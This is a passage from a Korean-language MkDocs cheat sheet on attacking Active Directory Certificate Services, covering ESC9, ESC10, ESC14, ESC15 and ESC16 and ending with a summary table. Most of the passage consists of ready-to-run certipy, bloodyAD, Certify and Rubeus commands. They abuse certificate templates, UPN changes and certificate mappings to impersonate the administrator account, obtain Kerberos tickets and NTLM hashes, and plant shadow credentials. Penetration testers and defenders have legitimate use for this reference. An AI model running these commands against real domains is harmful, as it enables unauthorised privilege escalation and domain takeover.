<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="c1"># GenericWrite on target user 필요</span>
<a id="__codelineno-14-3" name="__codelineno-14-3" href="#__codelineno-14-3"></a>
<a id="__codelineno-14-4" name="__codelineno-14-4" href="#__codelineno-14-4"></a><span class="c1"># 1. 현재 매핑 확인</span>
<a id="__codelineno-14-5" name="__codelineno-14-5" href="#__codelineno-14-5"></a>bloodyAD<span class="w"> </span>-d<span class="w"> </span>domain<span class="w"> </span>-u<span class="w"> </span>user<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>--host<span class="w"> </span>DC_IP<span class="w"> </span>get<span class="w"> </span>object<span class="w"> </span>target_user<span class="w"> </span>--attr<span class="w"> </span>altSecurityIdentities
<a id="__codelineno-14-6" name="__codelineno-14-6" href="#__codelineno-14-6"></a>
<a id="__codelineno-14-7" name="__codelineno-14-7" href="#__codelineno-14-7"></a><span class="c1"># 2. 공격자 인증서의 매핑을 대상 사용자에 추가</span>
<a id="__codelineno-14-8" name="__codelineno-14-8" href="#__codelineno-14-8"></a>bloodyAD<span class="w"> </span>-d<span class="w"> </span>domain<span class="w"> </span>-u<span class="w"> </span>user<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>--host<span class="w"> </span>DC_IP<span class="w"> </span><span class="nb">set</span><span class="w"> </span>object<span class="w"> </span>target_user<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-14-9" name="__codelineno-14-9" href="#__codelineno-14-9"></a><span class="w">  </span>altSecurityIdentities<span class="w"> </span>-v<span class="w"> </span><span class="s2">&quot;X509:&lt;I&gt;DC=local,DC=domain,CN=CA-NAME&lt;S&gt;CN=attacker&quot;</span>
<a id="__codelineno-14-10" name="__codelineno-14-10" href="#__codelineno-14-10"></a>
<a id="__codelineno-14-11" name="__codelineno-14-11" href="#__codelineno-14-11"></a><span class="c1"># 3. 인증서로 대상 사용자 인증</span>
<a id="__codelineno-14-12" name="__codelineno-14-12" href="#__codelineno-14-12"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>attacker.pfx<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP<span class="w"> </span>-username<span class="w"> </span>target_user<span class="w"> </span>-domain<span class="w"> </span>domain.local
</code></pre></div>
<hr />
<h2 id="certify-windows">Certify (Windows)</h2>
<p>Windows 환경에서 ADCS 열거 및 공격을 수행하는 C# 도구.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="c"># 취약 템플릿 탐색</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="n">Certify</span><span class="p">.</span><span class="n">exe</span> <span class="n">find</span> <span class="p">/</span><span class="n">vulnerable</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a>
<a id="__codelineno-15-4" name="__codelineno-15-4" href="#__codelineno-15-4"></a><span class="c"># 특정 CA 대상 탐색</span>
<a id="__codelineno-15-5" name="__codelineno-15-5" href="#__codelineno-15-5"></a><span class="n">Certify</span><span class="p">.</span><span class="n">exe</span> <span class="n">find</span> <span class="p">/</span><span class="n">vulnerable</span> <span class="p">/</span><span class="n">ca</span><span class="p">:</span><span class="n">CORP-CA</span>
<a id="__codelineno-15-6" name="__codelineno-15-6" href="#__codelineno-15-6"></a>
<a id="__codelineno-15-7" name="__codelineno-15-7" href="#__codelineno-15-7"></a><span class="c"># ESC1: SAN 지정 인증서 요청</span>
<a id="__codelineno-15-8" name="__codelineno-15-8" href="#__codelineno-15-8"></a><span class="n">Certify</span><span class="p">.</span><span class="n">exe</span> <span class="n">request</span> <span class="p">/</span><span class="n">ca</span><span class="p">:</span><span class="n">CORP-CA</span> <span class="p">/</span><span class="n">template</span><span class="p">:</span><span class="n">VulnTemplate</span> <span class="p">/</span><span class="n">altname</span><span class="p">:</span><span class="n">administrator</span>
<a id="__codelineno-15-9" name="__codelineno-15-9" href="#__codelineno-15-9"></a>
<a id="__codelineno-15-10" name="__codelineno-15-10" href="#__codelineno-15-10"></a><span class="c"># 인증서 변환 (Certify → Rubeus용)</span>
<a id="__codelineno-15-11" name="__codelineno-15-11" href="#__codelineno-15-11"></a><span class="n">openssl</span> <span class="n">pkcs12</span> <span class="n">-in</span> <span class="n">cert</span><span class="p">.</span><span class="n">pem</span> <span class="n">-keyex</span> <span class="n">-CSP</span> <span class="s2">&quot;Microsoft Enhanced Cryptographic Provider v1.0&quot;</span> <span class="n">-export</span> <span class="n">-out</span> <span class="n">cert</span><span class="p">.</span><span class="n">pfx</span>
<a id="__codelineno-15-12" name="__codelineno-15-12" href="#__codelineno-15-12"></a>
<a id="__codelineno-15-13" name="__codelineno-15-13" href="#__codelineno-15-13"></a><span class="c"># Rubeus로 TGT 요청</span>
<a id="__codelineno-15-14" name="__codelineno-15-14" href="#__codelineno-15-14"></a><span class="n">Rubeus</span><span class="p">.</span><span class="n">exe</span> <span class="n">asktgt</span> <span class="p">/</span><span class="n">user</span><span class="p">:</span><span class="n">administrator</span> <span class="p">/</span><span class="n">certificate</span><span class="p">:</span><span class="n">cert</span><span class="p">.</span><span class="n">pfx</span> <span class="p">/</span><span class="n">password</span><span class="p">:</span><span class="n">password</span> <span class="p">/</span><span class="n">ptt</span>
</code></pre></div>
<hr />
<h2 id="esc9-no-security-extension">ESC9: No Security Extension</h2>
<p>인증서에 보안 확장(szOID_NTDS_CA_SECURITY_EXT)이 없을 때, UPN을 변경하여 다른 사용자로 인증서를 요청할 수 있다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="c1"># 조건: CT_FLAG_NO_SECURITY_EXTENSION (0x80000) 설정된 CA 또는 StrongCertificateBindingEnforcement = 0</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="c1"># Step 1: 대상 계정의 UPN을 administrator로 변경 (GenericWrite 필요)</span>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a>certipy<span class="w"> </span>account<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-user<span class="w"> </span>targetuser<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-16-5" name="__codelineno-16-5" href="#__codelineno-16-5"></a><span class="w">  </span>-upn<span class="w"> </span>administrator<span class="w"> </span>update<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
<a id="__codelineno-16-6" name="__codelineno-16-6" href="#__codelineno-16-6"></a>
<a id="__codelineno-16-7" name="__codelineno-16-7" href="#__codelineno-16-7"></a><span class="c1"># Step 2: 인증서 요청</span>
<a id="__codelineno-16-8" name="__codelineno-16-8" href="#__codelineno-16-8"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>targetuser@domain<span class="w"> </span>-hashes<span class="w"> </span>:HASH<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-16-9" name="__codelineno-16-9" href="#__codelineno-16-9"></a><span class="w">  </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span>-template<span class="w"> </span>User<span class="w"> </span>-target<span class="w"> </span>DC_IP
<a id="__codelineno-16-10" name="__codelineno-16-10" href="#__codelineno-16-10"></a>
<a id="__codelineno-16-11" name="__codelineno-16-11" href="#__codelineno-16-11"></a><span class="c1"># Step 3: UPN 복원</span>
<a id="__codelineno-16-12" name="__codelineno-16-12" href="#__codelineno-16-12"></a>certipy<span class="w"> </span>account<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-user<span class="w"> </span>targetuser<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-16-13" name="__codelineno-16-13" href="#__codelineno-16-13"></a><span class="w">  </span>-upn<span class="w"> </span>targetuser@domain<span class="w"> </span>update<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
<a id="__codelineno-16-14" name="__codelineno-16-14" href="#__codelineno-16-14"></a>
<a id="__codelineno-16-15" name="__codelineno-16-15" href="#__codelineno-16-15"></a><span class="c1"># Step 4: 인증</span>
<a id="__codelineno-16-16" name="__codelineno-16-16" href="#__codelineno-16-16"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>administrator.pfx<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP
</code></pre></div>
<hr />
<h2 id="esc10">ESC10: 약한 인증서 매핑</h2>
<p>KB5014754 패치 이전에는 인증서와 계정 간 매핑이 약하여, UPN 변경을 통해 다른 사용자의 인증서를 획득할 수 있었다.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="c1"># 조건: CertificateMappingMethods에 UPN 매핑(0x4) 포함, StrongCertificateBindingEnforcement = 0</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="c1"># 대상 계정의 UPN을 administrator로 변경</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a>certipy<span class="w"> </span>account<span class="w"> </span>-u<span class="w"> </span><span class="s1">&#39;&lt;user&gt;&#39;</span><span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-user<span class="w"> </span>&lt;target&gt;<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-17-4" name="__codelineno-17-4" href="#__codelineno-17-4"></a><span class="w">  </span>-upn<span class="w"> </span><span class="s1">&#39;administrator&#39;</span><span class="w"> </span>update<span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;
<a id="__codelineno-17-5" name="__codelineno-17-5" href="#__codelineno-17-5"></a>
<a id="__codelineno-17-6" name="__codelineno-17-6" href="#__codelineno-17-6"></a><span class="c1"># 인증서 요청 (변경된 UPN으로)</span>
<a id="__codelineno-17-7" name="__codelineno-17-7" href="#__codelineno-17-7"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span><span class="s1">&#39;&lt;target&gt;&#39;</span><span class="w"> </span>-hashes<span class="w"> </span>&lt;hash&gt;<span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-17-8" name="__codelineno-17-8" href="#__codelineno-17-8"></a><span class="w">  </span>-ca<span class="w"> </span><span class="s1">&#39;&lt;ca_name&gt;&#39;</span><span class="w"> </span>-template<span class="w"> </span><span class="s1">&#39;User&#39;</span>
<a id="__codelineno-17-9" name="__codelineno-17-9" href="#__codelineno-17-9"></a>
<a id="__codelineno-17-10" name="__codelineno-17-10" href="#__codelineno-17-10"></a><span class="c1"># UPN 원래대로 복원 후 인증</span>
<a id="__codelineno-17-11" name="__codelineno-17-11" href="#__codelineno-17-11"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>administrator.pfx<span class="w"> </span>-domain<span class="w"> </span>&lt;domain&gt;
</code></pre></div>
<hr />
<h2 id="esc15-version-1-application-policies-cve-2024-49019">ESC15: Version 1 템플릿 Application Policies (CVE-2024-49019)</h2>
<p>Version 1 인증서 템플릿에서 Application Policy가 제대로 검증되지 않아, 요청 시 EKU를 조작하여 Client Authentication을 추가할 수 있었다. 2024년 11월 패치됨.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="c1"># 패치 전 환경에서: Version 1 템플릿에 EKU 조작하여 인증서 요청</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-ca<span class="w"> </span>CA-NAME<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="w">  </span>-template<span class="w"> </span>VulnV1Template<span class="w"> </span>-target<span class="w"> </span>DC_IP<span class="w"> </span><span class="se">\</span>
<a id="__codelineno-18-4" name="__codelineno-18-4" href="#__codelineno-18-4"></a><span class="w">  </span>-application-policies<span class="w"> </span><span class="s2">&quot;1.3.6.1.5.5.7.3.2&quot;</span><span class="w">  </span><span class="c1"># Client Authentication OID</span>
</code></pre></div>
<hr />
<h2 id="esc16-ca-security-extension">ESC16: CA Security Extension 제거</h2>
<p>CA에서 szOID_NTDS_CA_SECURITY_EXT 보안 확장이 완전히 제거된 경우. ESC9와 유사하지만, CA 레벨에서 보안 확장이 없으므로 모든 템플릿이 취약해진다. StrongCertificateBindingEnforcement 설정과 무관하게 악용 가능.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="c1"># ESC9와 동일한 공격 방식 (UPN 변경 → 인증서 요청 → 인증)</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="c1"># CA 자체에서 Security Extension이 비활성화되므로 모든 인증서가 영향받음</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a>certipy<span class="w"> </span>find<span class="w"> </span>-u<span class="w"> </span>user@domain<span class="w"> </span>-p<span class="w"> </span>pass<span class="w"> </span>-dc-ip<span class="w"> </span>DC_IP<span class="w"> </span>-vulnerable
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="c1"># &quot;Certificate Authority&quot; 섹션에서 &quot;szOID_NTDS_CA_SECURITY_EXT&quot; 확인</span>
</code></pre></div>
<hr />
<h2 id="certipy">Certipy 주요 명령어</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="c1"># 취약 템플릿 탐색</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a>certipy<span class="w"> </span>find<span class="w"> </span>-vulnerable<span class="w"> </span>-u<span class="w"> </span>&lt;user&gt;<span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;<span class="w"> </span>-stdout
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="c1"># 인증서 요청</span>
<a id="__codelineno-20-5" name="__codelineno-20-5" href="#__codelineno-20-5"></a>certipy<span class="w"> </span>req<span class="w"> </span>-u<span class="w"> </span><span class="s1">&#39;&lt;user&gt;@&lt;domain&gt;&#39;</span><span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-ca<span class="w"> </span><span class="s1">&#39;&lt;ca_name&gt;&#39;</span><span class="w"> </span><span class="se">\</span>
<a id="__codelineno-20-6" name="__codelineno-20-6" href="#__codelineno-20-6"></a><span class="w">  </span>-template<span class="w"> </span><span class="s1">&#39;&lt;template&gt;&#39;</span><span class="w"> </span>-upn<span class="w"> </span><span class="s1">&#39;&lt;target_upn&gt;&#39;</span><span class="w"> </span>-target<span class="w"> </span>&lt;dc_fqdn&gt;
<a id="__codelineno-20-7" name="__codelineno-20-7" href="#__codelineno-20-7"></a>
<a id="__codelineno-20-8" name="__codelineno-20-8" href="#__codelineno-20-8"></a><span class="c1"># pfx로 인증 및 NTLM 해시 획득</span>
<a id="__codelineno-20-9" name="__codelineno-20-9" href="#__codelineno-20-9"></a>certipy<span class="w"> </span>auth<span class="w"> </span>-pfx<span class="w"> </span>&lt;file&gt;.pfx<span class="w"> </span>-domain<span class="w"> </span>&lt;domain&gt;<span class="w"> </span>-dc-ip<span class="w"> </span>&lt;dc_ip&gt;
<a id="__codelineno-20-10" name="__codelineno-20-10" href="#__codelineno-20-10"></a>
<a id="__codelineno-20-11" name="__codelineno-20-11" href="#__codelineno-20-11"></a><span class="c1"># Shadow Credentials</span>
<a id="__codelineno-20-12" name="__codelineno-20-12" href="#__codelineno-20-12"></a>certipy<span class="w"> </span>shadow<span class="w"> </span>auto<span class="w"> </span>-username<span class="w"> </span>&lt;user&gt;@&lt;domain&gt;<span class="w"> </span>-password<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-account<span class="w"> </span>&lt;target&gt;
<a id="__codelineno-20-13" name="__codelineno-20-13" href="#__codelineno-20-13"></a>
<a id="__codelineno-20-14" name="__codelineno-20-14" href="#__codelineno-20-14"></a><span class="c1"># UPN 변경</span>
<a id="__codelineno-20-15" name="__codelineno-20-15" href="#__codelineno-20-15"></a>certipy<span class="w"> </span>account<span class="w"> </span>-u<span class="w"> </span><span class="s1">&#39;&lt;user&gt;&#39;</span><span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-user<span class="w"> </span>&lt;target&gt;<span class="w"> </span>-upn<span class="w"> </span><span class="s1">&#39;&lt;new_upn&gt;&#39;</span><span class="w"> </span>update
<a id="__codelineno-20-16" name="__codelineno-20-16" href="#__codelineno-20-16"></a>
<a id="__codelineno-20-17" name="__codelineno-20-17" href="#__codelineno-20-17"></a><span class="c1"># 템플릿 설정 변경</span>
<a id="__codelineno-20-18" name="__codelineno-20-18" href="#__codelineno-20-18"></a>certipy<span class="w"> </span>template<span class="w"> </span>-u<span class="w"> </span>&lt;user&gt;@&lt;domain&gt;<span class="w"> </span>-p<span class="w"> </span><span class="s1">&#39;&lt;pass&gt;&#39;</span><span class="w"> </span>-template<span class="w"> </span>&lt;name&gt;<span class="w"> </span>-save-old
</code></pre></div>
<hr />
<h2 id="esc">ESC 요약</h2>
<table>
<thead>
<tr>
<th>ESC</th>
<th>공격 벡터</th>
<th>영향</th>
<th>상태</th>
</tr>
</thead>
<tbody>
<tr>
<td>ESC1</td>
<td>Subject 지정 가능 템플릿</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC2</td>
<td>Any Purpose EKU</td>
<td>제한적</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC3</td>
<td>Enrollment Agent</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC4</td>
<td>템플릿 ACL</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC5</td>
<td>PKI 객체 ACL</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC6</td>
<td>EDITF_ATTRIBUTESUBJECTALTNAME2</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC7</td>
<td>CA ACL</td>
<td>도메인 장악</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC8</td>
<td>NTLM Relay → HTTP</td>
<td>권한 상승</td>
<td>EPA로 완화</td>
</tr>
<tr>
<td>ESC9</td>
<td>Security Extension 미적용</td>
<td>지속성</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC10</td>
<td>약한 인증서 매핑</td>
<td>권한 상승</td>
<td>KB5014754</td>
</tr>
<tr>
<td>ESC11</td>
<td>RPC 암호화 미적용</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC12</td>
<td>CA 셸/DCOM 접근</td>
<td>도메인 장악</td>
<td>접근 필요</td>
</tr>
<tr>
<td>ESC13</td>
<td>Issuance Policy 링크 그룹</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC14</td>
<td>약한 Explicit Mapping</td>
<td>권한 상승</td>
<td>구성 문제</td>
</tr>
<tr>
<td>ESC15</td>
<td>Version 1 템플릿</td>
<td>권한 상승</td>
<td>패치됨</td>
</tr>
<tr>
<td>ESC16</td>
<td>Security Extension 제거</td>
<td>전체 취약</td>
<td>활성 위협</td>
</tr>
</tbody>
</table>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      
      <script id="__config" type="application/json">{"annotate": null, "base": "../..", "features": ["navigation.tabs", "navigation.sections", "navigation.expand", "search.highlight", "content.code.copy"], "search": "../../assets/javascripts/workers/search.2c215733.min.js", "tags": null, "translations": {"clipboard.copied": "\ud074\ub9bd\ubcf4\ub4dc\uc5d0 \ubcf5\uc0ac\ub428", "clipboard.copy": "\ud074\ub9bd\ubcf4\ub4dc\ub85c \ubcf5\uc0ac", "search.result.more.one": "\uc774 \ubb38\uc11c\uc5d0\uc11c 1\uac1c\uc758 \uac80\uc0c9 \uacb0\uacfc \ub354 \ubcf4\uae30", "search.result.more.other": "\uc774 \ubb38\uc11c\uc5d0\uc11c #\uac1c\uc758 \uac80\uc0c9 \uacb0\uacfc \ub354 \ubcf4\uae30", "search.result.none": "\uac80\uc0c9\uc5b4\uc640 \uc77c\uce58\ud558\ub294 \ubb38\uc11c\uac00 \uc5c6\uc2b5\ub2c8\ub2e4", "search.result.one": "1\uac1c\uc758 \uc77c\uce58\ud558\ub294 \ubb38\uc11c", "search.result.other": "#\uac1c\uc758 \uc77c\uce58\ud558\ub294 \ubb38\uc11c", "search.result.placeholder": "\uac80\uc0c9\uc5b4\ub97c \uc785\ub825\ud558\uc138\uc694", "search.result.term.missing": "\ud3ec\ud568\ub418\uc9c0 \uc54a\uc740 \uac80\uc0c9\uc5b4", "select.version": "\ubc84\uc804 \uc120\ud0dd"}, "version": null}</script>
    
    
      <script src="../../assets/javascripts/bundle.79ae519e.min.js"></script>
      
    
  </body>
</html>